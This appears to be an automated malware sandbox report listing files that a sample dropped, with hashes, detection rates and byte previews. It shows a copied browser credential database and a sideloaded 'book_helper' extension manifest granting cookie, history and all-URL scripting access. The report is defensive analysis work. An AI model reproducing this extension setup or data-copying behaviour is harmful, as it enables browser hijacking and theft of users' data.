                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.h.Q.;.Q.;.Q.;.Y.;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;Sr.;.Q.;.Y.;.Q.;*Y.;.Q.;.Q.;.P.;...;.Q.;'F.;.Q.;EZ.;.Q.;'F.;.Q.;Rich.Q.;........................PE..L...^..S..........................................@..........................`......"Q...............................................P..x............................................................................................................textbss1U...............................text...>....p...................... ..`.rdata...i.......p... ..............@..@.data...L...........................@....idata...J.......P..................@....rsrc...x....P......................@..@........................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):73160
                                                                                                                                                Entropy (8bit):6.49500452335621
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
                                                                                                                                                MD5:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                SHA1:27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
                                                                                                                                                SHA-256:298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
                                                                                                                                                SHA-512:65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: N1yprTBBXs.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D."C..L...L...L.......L.....&.L.......L.....Y.L.'~!...L.'~7...L...M.\.L.......L.......L.......L.Rich..L.........PE..L......P.....................X.......$............@..........................@......>.....@.....................................P............................ ..d...`...............................P...@............... ............................text...|........................... ..`.rdata...&.......(..................@..@.data...............................@....rsrc...............................@..@.reloc..H.... ......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\atl71.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):89600
                                                                                                                                                Entropy (8bit):6.46929682960805
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
                                                                                                                                                MD5:79CB6457C81ADA9EB7F2087CE799AAA7
                                                                                                                                                SHA1:322DDDE439D9254182F5945BE8D97E9D897561AE
                                                                                                                                                SHA-256:A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
                                                                                                                                                SHA-512:ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92080
                                                                                                                                                Entropy (8bit):5.923150781730819
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
                                                                                                                                                MD5:DBA9A19752B52943A0850A7E19AC600A
                                                                                                                                                SHA1:3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
                                                                                                                                                SHA-256:69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
                                                                                                                                                SHA-512:A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.|...|...|...t...|...p...|...p...|...p...|...p...|..~t...|..._...|...t...|..~t...|...|..6|..sk...|..sk...|...w...|..sk...|..Rich.|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\download_user.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3512776
                                                                                                                                                Entropy (8bit):6.514740710935125
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
                                                                                                                                                MD5:1A87FF238DF9EA26E76B56F34E18402C
                                                                                                                                                SHA1:2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
                                                                                                                                                SHA-256:ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
                                                                                                                                                SHA-512:B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview: MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):503808
                                                                                                                                                Entropy (8bit):6.4043708480235715
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
                                                                                                                                                MD5:A94DC60A90EFD7A35C36D971E3EE7470
                                                                                                                                                SHA1:F936F612BC779E4BA067F77514B68C329180A380
                                                                                                                                                SHA-256:6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
                                                                                                                                                SHA-512:FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):348160
                                                                                                                                                Entropy (8bit):6.56488891304105
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
                                                                                                                                                MD5:CA2F560921B7B8BE1CF555A5A18D54C3
                                                                                                                                                SHA1:432DBCF54B6F1142058B413A9D52668A2BDE011D
                                                                                                                                                SHA-256:C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
                                                                                                                                                SHA-512:23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.............K.E.........S...F.x.....F......F.G.....F.D.....F.F.....F.B.....Rich............................PE..L....Q.D...........!..............................6|.........................`......V...............................L....C......(.... .......................0..h+......8...............................H...............l............................text............................... ..`.rdata..`...........................@..@.data....h.......`..................@....rsrc........ ......................@..@.reloc..h+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\zlib1.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):59904
                                                                                                                                                Entropy (8bit):6.753320551944624
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
                                                                                                                                                MD5:89F6488524EAA3E5A66C5F34F3B92405
                                                                                                                                                SHA1:330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
                                                                                                                                                SHA-256:BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
                                                                                                                                                SHA-512:CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."u.-f..~f..~f..~c..~e..~c..~g..~c..~c..~c..~d..~...~d..~f..~~..~...~k..~...~d..~...~g..~...~g..~...~g..~Richf..~........................PE..L...%..M...........!.........R....................[!.........................0.........................................].......<............................ ..........................................................h............................text............................... ..`.rdata...F.......H..................@..@.data...t...........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\ecvFEAD.tmp
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                File Type:Extensible storage user DataBase, version 0x620, checksum 0x0e9c6472, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):26738688
                                                                                                                                                Entropy (8bit):0.919147268799695
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:GqX+wPy7f2s6JhNIhenjNa2fVccgeTaNX:G8s6Rn
                                                                                                                                                MD5:CEBB58A6BA0A64A6853BBE61CF15F909
                                                                                                                                                SHA1:15A85A4F09758DD26BEB3A867DEBB36E093F8BEE
                                                                                                                                                SHA-256:334F3C3C11CE18571D4827950985CEC05B162C868B443D3CADFAFEE187E57B29
                                                                                                                                                SHA-512:E9AF84474677FC19F0FB7A32962B87A311AF607582568ECD80EB13B5EAA11A72061F69F1654F83C1C6AEBD116FA60BF91502CE61F06BCAC0662160FE0E7AE103
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: ..dr... .......Z........Ef..4...w.............................."....x{......x..h..............................W.4...w..............................................................................................[............B.................................................................................................................. ........$...y......................................................................................................................................................................................................................................C.'..$...y.}................w~.`'....x..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\gdiview.msi
                                                                                                                                                Process:C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                File Type:;1033
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):237056
                                                                                                                                                Entropy (8bit):6.262405449836627
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
                                                                                                                                                MD5:7CC103F6FD70C6F3A2D2B9FCA0438182
                                                                                                                                                SHA1:699BD8924A27516B405EA9A686604B53B4E23372
                                                                                                                                                SHA-256:DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
                                                                                                                                                SHA-512:92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: ......................>.......................................................|.......|...................................................................................................................................................................................................................................................................................................................................................................................................................................................d.......D....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...c...E...F...G...H...I...J...K...L...b...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......e.......w.......g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...x.......y...z...
                                                                                                                                                C:\Users\user\AppData\Local\Temp\xldl.dat
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:7-zip archive data, version 0.3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1397922
                                                                                                                                                Entropy (8bit):7.999863097294012
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
                                                                                                                                                MD5:18C413810B2AC24D83CD1CDCAF49E5E1
                                                                                                                                                SHA1:ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
                                                                                                                                                SHA-256:9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
                                                                                                                                                SHA-512:FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: 7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5*zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~|J^.*YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....|..n1...Y.i4\.ZN..V....U)...|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.
                                                                                                                                                C:\Users\user\AppData\Local\Temp\xldl.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):293320
                                                                                                                                                Entropy (8bit):6.347427939821131
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
                                                                                                                                                MD5:208662418974BCA6FAAB5C0CA6F7DEBF
                                                                                                                                                SHA1:DB216FC36AB02E0B08BF343539793C96BA393CF1
                                                                                                                                                SHA-256:A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
                                                                                                                                                SHA-512:8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Web Data1611970646229
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):73728
                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\crx.7z
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:7-zip archive data, version 0.3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):36105
                                                                                                                                                Entropy (8bit):7.994610469125073
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
                                                                                                                                                MD5:DAFDD7237BA10D0C91295CD1C15749B2
                                                                                                                                                SHA1:45D55EE145BC71921271BA5493F13D3428589D4D
                                                                                                                                                SHA-256:B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
                                                                                                                                                SHA-512:50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: 7z..'.....9........$........^x..D...z'...P.....P'.B..a.Ik.?h.O (<M..A...S...>l...[.y...E.BF.@.*w..43..{.b.G...(...=.Q.2'.9.l%..~.4..`~.uX6.....S.....T..K.\)}..,+>\YeFp-...<.Otpw......#.NV.........~.;.(..-.F~...R.$s..m..}/.>..x..>..Osw..m..A.O.h].dWz1.mf.-..'tI.H.So.$.~.7um..\[...-.m.wY.....0.`.......y...;......-..w..L".T.W..!...`6....U........n.(...z..".^...R..b.G.;.W....k2..|.jS...m.....M.jZ5W.>...j.....{T.H....Q.?.Ybun.......gPd....E.<k.Z.eA".k.G.......6'.a.X >o.D4.r...E...N.....w....S.........5..[O.=.?..Q..Q.,.."..@..5./.V...."[.K.:..V.......L..{.XYWU...^...........2x.E.b..E....1.....#Gl.3...2.W[X9.g.X`.u$fZ.o....z..>hY.?..g,T}S.q+........eT..0e..&..`2...[.s...{.._.h.C7c.zH.......!...'!`..].m..8V.-".....nVa....^...Tx/..........4.?.v.Z.....o......C.cWt8-.....^|..d..He...!.7....T.X..?.d0..ly...T..u......,L..S1.a.....:..3Z;*...M.73.......`....a....`C~}.r.&FOY..aA.w..y..5..K@.N..........0$.>..I.@#.:...q1...H.S...|....3...X.E.N.I7...]".50.6...or
                                                                                                                                                C:\Users\user\AppData\Local\crx.json
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1981
                                                                                                                                                Entropy (8bit):5.365969892012237
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
                                                                                                                                                MD5:B5CEED4A6FA3F501787DE10B4CB02EEE
                                                                                                                                                SHA1:F09C0A8CA18D825D6CE6F192090EBD0659C7321B
                                                                                                                                                SHA-256:749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
                                                                                                                                                SHA-512:02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: {"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false
                                                                                                                                                C:\Users\user\AppData\Localwebdata1611970646229
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):73728
                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):103632
                                                                                                                                                Entropy (8bit):6.404475911013687
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
                                                                                                                                                MD5:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                SHA1:B5EE276E8D479C270ECEB497606BD44EE09FF4B8
                                                                                                                                                SHA-256:6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
                                                                                                                                                SHA-512:EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Roaming\1611970637183.txt
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):23914
                                                                                                                                                Entropy (8bit):3.719911941386575
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:b3r3Ii3M35gYs3b370v323V3b3h7I67T3qihW/j+es8JlkS3D:bb/cJgYsLL0vmFLR7IUqmR8JlkS3D
                                                                                                                                                MD5:A8B67189AA1F9DAA1DF00583F7A3DA6F
                                                                                                                                                SHA1:0D5F62621E11E7EBA831576B56FADAED57D31DCA
                                                                                                                                                SHA-256:5A427E57B186089AAC42F1C00D9D88ACCCAD0E1C0423BEFA769A7E72E9F826E6
                                                                                                                                                SHA-512:673F9D7CA779F4E136503B6A0B2914BA24E28E23EA78503D9A47308030C02E52A5C95445EC396399ED0DE578F0ED89E5E1038F573A666D71693FAE19F23EF4BA
                                                                                                                                                Malicious:false
